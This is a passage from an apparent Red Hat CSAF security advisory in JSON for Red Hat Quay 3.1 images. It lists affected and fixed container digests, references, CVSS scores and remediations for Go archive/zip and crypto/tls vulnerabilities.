"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-61728"
},
{
"category": "external",
"summary": "RHBZ#2434431",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2434431"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-61728",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61728"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61728",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61728"
},
{
"category": "external",
"summary": "https://go.dev/cl/736713",
"url": "https://go.dev/cl/736713"
},
{
"category": "external",
"summary": "https://go.dev/issue/77102",
"url": "https://go.dev/issue/77102"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc",
"url": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4342",
"url": "https://pkg.go.dev/vuln/GO-2026-4342"
}
],
"release_date": "2026-01-28T19:30:31.354000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T18:02:58+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5665"
},
{
"category": "workaround",
"details": "To mitigate this vulnerability, implement a timeout in your archive/zip processing logic to abort the operation if it exceeds a few seconds, preventing the application from consuming an excessive amount of resources.",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang: archive/zip: Excessive CPU consumption when building archive index in archive/zip"
},
{
"cve": "CVE-2025-68121",
"discovery_date": "2026-02-05T18:01:30.086058+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2437111"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the crypto/tls component. This vulnerability occurs during Transport Layer Security (TLS) session resumption when certificate authority (CA) settings are modified between the initial and resumed handshakes. An attacker could exploit this to bypass certificate validation, allowing a client or server to establish a connection that should have been rejected. This could lead to an authentication bypass under specific conditions.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "crypto/tls: crypto/tls: Incorrect certificate validation during TLS session resumption",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is a moderate flaw because it only occurs under specific conditions, such as TLS session resumption with runtime changes to certificate authority settings. Exploitation is not straightforward and requires a controlled setup. The impact is limited to certificate validation within the same component and does not affect system availability.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-68121"
},
{
"category": "external",
"summary": "RHBZ#2437111",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2437111"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-68121",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68121"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-68121",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68121"
},
{
"category": "external",
"summary": "https://go.dev/cl/737700",
"url": "https://go.dev/cl/737700"
},
{
"category": "external",
"summary": "https://go.dev/issue/77217",
"url": "https://go.dev/issue/77217"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/K09ubi9FQFk",
"url": "https://groups.google.com/g/golang-announce/c/K09ubi9FQFk"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4337",
"url": "https://pkg.go.dev/vuln/GO-2026-4337"
}
],
"release_date": "2026-02-05T17:48:44.141000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T18:02:58+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5665"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "crypto/tls: crypto/tls: Incorrect certificate validation during TLS session resumption"
},
{
"cve": "CVE-2026-25639",
"cwe": {
"id": "CWE-1287",
"name": "Improper Validation of Specified Type of Input"
},
"discovery_date": "2026-02-09T21:00:49.280114+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
